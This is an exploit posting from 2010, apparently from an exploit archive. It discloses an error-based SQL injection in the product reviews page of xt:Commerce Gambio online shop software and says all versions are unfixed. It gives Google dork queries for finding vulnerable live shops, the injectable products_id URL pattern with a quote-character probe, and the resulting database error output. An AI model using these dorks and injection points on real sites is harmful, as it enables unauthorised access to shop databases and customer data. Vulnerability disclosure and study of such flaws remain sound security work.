xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"
# Published : 2010-09-18
# Author : secret
# Previous Title : Joomla RestaurantGuide Component (com_restaurantguide) Multiple Vulnerabilities
# Next Title : MOAUB #18 - CMSimple XSRF Vulnerability

   ________  _____________  / /_
  / ___/ _ / ___/ ___/ _ / __/
 (__  )  __/ /__/ /  /  __/ /_  
/____/___/___/_/   ___/__/  

# Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"
# Date: 2010-09-18
# Author: secret
# Contact : secret_hf@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.gambio.de/
# Version: 2006 - 2008 - 2010 - all versions
# Tested on: XP / Linux

# Fixed? : NOT FIXED

# Dorks : Gambio inurl:"reviews.php" / Gambio inurl:"product_reviews.php?products_id=" etc...

##############################################################################################

[ERROR BASED SQL INJECTION]

http://www.xxxxx.com/product_reviews_info.php?products_id=x[SQL INJECTION]

e.g. http://server/product_reviews_info.php?products_id=4[ERROR BASED SQL INECTION]
e.g. http://server/product_reviews_info.php?products_id=4'

->   xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064

##############################################################################################

[THANKS TO]

ALLAH - ???? ?? ??? ?? ???

To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION